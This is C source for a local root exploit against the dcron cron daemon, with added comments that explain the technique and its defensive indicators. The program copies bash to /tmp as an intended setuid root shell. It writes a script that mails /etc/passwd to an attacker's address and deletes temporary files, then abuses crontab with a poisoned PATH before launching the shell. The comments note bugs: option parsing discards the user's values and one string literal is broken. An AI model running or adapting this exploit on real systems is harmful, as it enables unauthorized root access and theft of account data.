/***********************************************
 * released under (E) licensing ...            *
 *        (E) RULES AND REGULATIONS            *
 * permission to use/rewrite/add     : granted *
 * permission to trojan/steal        : denied  *
 * permission to use illegally       : denied  *
 * permission to use on /dev/urandom : denied  *
 ***********************************************/
/* contact el8@press.co.jp for full license    */
/* code copyrighted by ~el8 -- don't infringe! */


/*************************************************************************\
| ----====----====---- . . LOCAL  DCRON  EXPLOIT . . ----====----====---- |
|                                                                         |
|                            brought to you by                            |
|                                                                         |
| (C) Michal Zalewski <lcamtuf@ids.pl> . and . Nergal <nergal@icm.edu.pl> |
|                                                                         |
| ----------------------------------------------------------------------- |
| Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] |
| ----------------------------------------------------------------------- |
|                                                                         |
\*************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <ctype.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
/* Status-line printer.  The caller's format string `x` is pasted onto a
 * coloured prefix by literal concatenation, so `x` must be a string literal
 * (it is at every call site in this file); `p...`/`##p` is the GNU named
 * variadic-macro form, not standard C. */
#define PRINT_STATUS(x,p...) printf("\033[1;35m:::\033[0;35m    "x,##p)

/* Tentative definitions; the initialised definitions (with the
 * DEFAULT_* values) appear further down, just before get_options(). */
char*cron_path;        /* path the generated crontab line points at (-p) */
char*email_address;    /* mailbox the generated script mails to (-e) */
extern char**environ;  /* current environment, handed to execle() in shell() */

void print_banner(void) {
        /* Coloured one-line title.  The two halves are concatenated at
         * compile time and written to stdout in a single call. */
        fputs("\033[1;37m\t\t ---===---===--- \033[0;31md\033[1;31mcron  "
              "\033[1;33mLOCAL \033[1;36m EXPLOIT \033[1;37m---===---===---\n",
              stdout);
}

void print_help(void) {
        /* Usage text, emitted as one literal; trailing escape resets the
         * terminal colour. */
        fputs("\n\t\tUsage:"
              "\t\033[0;35m./dcron -e your_email [-p path_to_crond]\n"
              "\033[0;37m\n",
              stdout);
}

/* Writes a shell script named "nnn" into the current directory and marks it
 * 0755.  The script body is spelled out below: it installs a crontab entry
 * that names cron_path, mails /etc/passwd to email_address, sets the setuid
 * bit on /tmp/boomsh, deletes /tmp/cron* and /tmp/gcc*, then removes the
 * crontab again.  From a defender's view these are the artefacts the tool
 * leaves behind: a crontab line whose command is the crond binary itself,
 * and a 4755 copy of bash in /tmp.  Exits the process if fopen fails;
 * fclose's return value is not checked, so a short write goes unnoticed. */
void make_tempfile(void) {
        FILE*temp;
        char*file="nnn";
        if((temp=fopen(file,"w"))==NULL) {
                perror("fopen!!!");
                (void)exit(1);
            }
        fprintf(temp,"###############################\n");
        fprintf(temp,"## DCRON EXPLOIT - TEMP FILE ##\n");
        fprintf(temp,"###############################\n");
        fprintf(temp,"\n");
        fprintf(temp,"crontab - << EOF\n");
        fprintf(temp,"* * * * * %s\n",cron_path);
        fprintf(temp,"EOF\n");
        fprintf(temp,"\n");
        fprintf(temp,"mail %s < /etc/passwd\n",email_address);
        fprintf(temp,"chmod 4755 /tmp/boomsh\n");
        fprintf(temp,"rm -f /tmp/cron* /tmp/gcc*\n");
        fprintf(temp,"\n");
        fprintf(temp,"crontab -d 2>&1 1>/dev/null\n");
        fprintf(temp,"printf '\033[0;37m'\n");
        fprintf(temp,"\n");
        fprintf(temp,"## DONE!\n");
        fflush(temp);
        fclose(temp);
        /* world-readable and executable; the script is meant to be run by
         * something other than this process */
        (void)chmod(file,0755);
        PRINT_STATUS("Tempfile ready!\n");
    }

/* Forks, runs /usr/bin/crontab in the child and waits for it.
 * Note: execl's second argument becomes the child's argv[0], so here the
 * child sees argv[0] == "-c" and argv[1] == "./"; a getopt-style parser
 * starting at argv[1] would never see "-c" as an option.  fork() returning
 * -1 is not handled (waitpid(-1, ...) then waits for any child), and the
 * collected exit status is never examined.  The sleep(1) appears to be a
 * crude pacing delay; nothing here depends on it. */
void add_crontab_entry(void) {
        int status;
        pid_t pid;
        if((pid=fork())==0) {
                (void)execl("/usr/bin/crontab","-c","./",NULL);
                (void)_exit(-1);   /* only reached if exec fails */
            }
        (void)sleep(1);
        (void)waitpid(pid,&status,0);
    }

/* Counterpart of add_crontab_entry(): same fork/exec/wait shape with "-d".
 * The same argv[0] quirk applies -- "-d" is passed as argv[0], not as an
 * option after the program name -- and the same unchecked fork() result and
 * unused exit status. */
void remove_crontab_entry(void)
{
        int status;
        pid_t pid;
        if((pid=fork())==0) {
                (void)execl("/usr/bin/crontab","-d","./",NULL);
                (void)_exit(-1);   /* only reached if exec fails */
            }
        (void)sleep(1);
        (void)waitpid(pid,&status,0);
    }

/* Runs the add/remove crontab cycle three times after rewriting PATH so that
 * /var/spool/cron and "." come before the system directories.  The exported
 * PATH is inherited by the crontab children; the technique appears to rely
 * on the cron side resolving a command through that inherited PATH (the
 * crond side is not shown here, so this is inferred from the spool and "."
 * entries).  Defensive note: a daemon that resets its environment and runs
 * entries by absolute path is not affected by this, and a crontab process
 * whose PATH contains "." or a spool directory is a reasonable detection
 * signal.  The "(n/3)" progress lines are purely cosmetic. */
void bombard_crond(void) {
        int i;
        setenv("PATH","/var/spool/cron:/usr/bin:.:/bin/:/usr/sbin",1);  /* overwrite=1 */
        for(i=0;i<3;i++) {
                PRINT_STATUS("Adding a crontab entry ... \033[1;32m(%d/3)\n",i+1);
                add_crontab_entry();
                PRINT_STATUS("Removing the entry ... \033[1;32m(%d/3)\n",i+1);
                remove_crontab_entry();
            }
        PRINT_STATUS("Processing...!!\n");
    }

/* Copies /bin/bash to /tmp/boomsh in 5000-byte chunks and makes it 0755.
 * Defects worth noting: open(..., O_WRONLY|O_CREAT) omits the mode argument,
 * so the file's initial permission bits come from whatever is read as the
 * missing third argument (undefined behaviour, masked by the later chmod);
 * write()'s return value is ignored, so a short write silently corrupts the
 * copy; O_TRUNC is not set, so an existing, larger /tmp/boomsh keeps its
 * trailing bytes.  The comment on the chmod line records the intended end
 * state -- a setuid copy of bash -- which is also the indicator a defender
 * would monitor for (setuid files appearing in a world-writable directory).
 * `u_char` comes from <sys/types.h>. */
void make_boomsh(void) {
        u_char buf[5000];
        int sh,boomsh,e;
        sh=open("/bin/bash",O_RDONLY);
        if(sh==-1) {
                perror("copy!!!");
                (void)exit(1);
            }
        boomsh=open("/tmp/boomsh",O_WRONLY|O_CREAT);   /* mode argument missing */
        if(boomsh==-1) {
                perror("copy!!!");
                (void)exit(1);
            }
        while((e=read(sh,buf,5000))>0) {
                (void)write(boomsh,buf,e);   /* short writes not detected */
            }
        (void)close(sh);
        (void)close(boomsh);
        (void)chmod("/tmp/boomsh",0755);//crond will make it 4755 root!!!
}

/* Prints the closing banners and replaces this process with /tmp/boomsh,
 * passing the current environment through.  If execle() fails the function
 * simply returns to main, which then falls off its end.  The third
 * PRINT_STATUS literal below is split across two physical lines in this
 * listing (an unterminated string as shown); presumably a line-wrapping
 * artefact of the page rather than the original source -- confirm before
 * building. */
void shell(void) {
        PRINT_STATUS("\033[1;37m  ----====---- \033[1;36m EXPLOIT \033[1;32m FINISHED \033[1;37m  ----====----\n");
        PRINT_STATUS("\033[1;37m  ---====-- \033[1;34m WAITING \033[1;35m FOR\033[5;33m ROOTSHELL! \033[1;37m  --====---\n");
        PRINT_STATUS("\033[1;37m  ---====-- \033[1;34m HIT RETURN \033[1;35m TO
\033[5;33m SYNC!!!! \033[1;37m  --====---\n");
        PRINT_STATUS("\033[1;37m  ----=====---- \033[1;32m!\033[1;34m!\033[5;0n!\033[1;33m!\033[5;0n!\033[5;0n!\033[0;30m ----====----\n");
        execle("/tmp/boomsh","boomsh",NULL,environ);   /* return value unchecked */
    }


/* Defaults for -e and -p.  These are the initialised definitions of the two
 * globals tentatively declared near the top of the file; get_options()
 * reinstates them after option parsing (see its trailing `if` blocks). */
#define DEFAULT_EMAIL_ADDRESS   "your-address@mail.com"
#define DEFAULT_CRON_PATH       "/usr/sbin/crond"

char* email_address = DEFAULT_EMAIL_ADDRESS;
char* cron_path = DEFAULT_CRON_PATH;

/* Parses -p <crond path>, -e <email address> and -h (or any unknown option,
 * which prints help and exits 0).  getopt signals end-of-options with -1;
 * the loop compares against EOF, which merely happens to be -1 on common
 * libcs.  After parsing, both `if` bodies effectively run unconditionally:
 * the two pointers start out as the file-scope defaults, and strdup only
 * replaces them with another non-NULL value (barring allocation failure),
 * so whatever -p/-e supplied is overwritten with the default again and the
 * strdup'd copy is leaked.  As written, -p and -e therefore have no effect
 * on the rest of the program.  The (char*) casts on strdup are redundant. */
void get_options(int argc,char*argv[])
{
        int a;
#define GETOPT_ARGUMENTS "p:e:h"
        while((a=getopt(argc,argv,GETOPT_ARGUMENTS))!=EOF) {
                switch(a) {
                        case 'p':
                        cron_path=(char*)strdup(optarg);
                        break;
                        case 'e':
                        email_address=(char*)strdup(optarg);
                        break;
                        case 'h':
                        default:
                        (void)print_help();
                        (void)exit(0);
                    }
            }
        /* both conditions hold whenever the pointers are non-NULL, i.e.
         * always, so the defaults win over the parsed values */
        if(cron_path) {
                cron_path=DEFAULT_CRON_PATH;
            }
        if(email_address) {
                email_address=DEFAULT_EMAIL_ADDRESS;
            }
    }

// MAIN

/* Entry point: banner, argument check, option parsing, then the four stages
 * in order (copy bash to /tmp, write the "nnn" script, cycle crontab, exec
 * /tmp/boomsh).  shell() ends in execle(), so on success control never
 * comes back here; if that exec fails, main falls off its end with no
 * return statement (implicitly returns 0 in C99, undefined in C89).  The
 * (void) casts on void-returning calls are no-ops. */
int main (int argc,char*argv[]) {
        (void)print_banner();
        if(argc<2) {
                (void)print_help();
                (void)exit(0);
        }
        (void)get_options(argc,argv);
        PRINT_STATUS("Making /tmp/boomsh...\n");
        (void)make_boomsh();
        PRINT_STATUS("Making tempfile...\n");
        (void)make_tempfile();
        PRINT_STATUS("Bombing crond...\n");
        (void)bombard_crond();
        PRINT_STATUS("ROOTSHELL ENJOY!!!\n");
        (void)shell();
    }

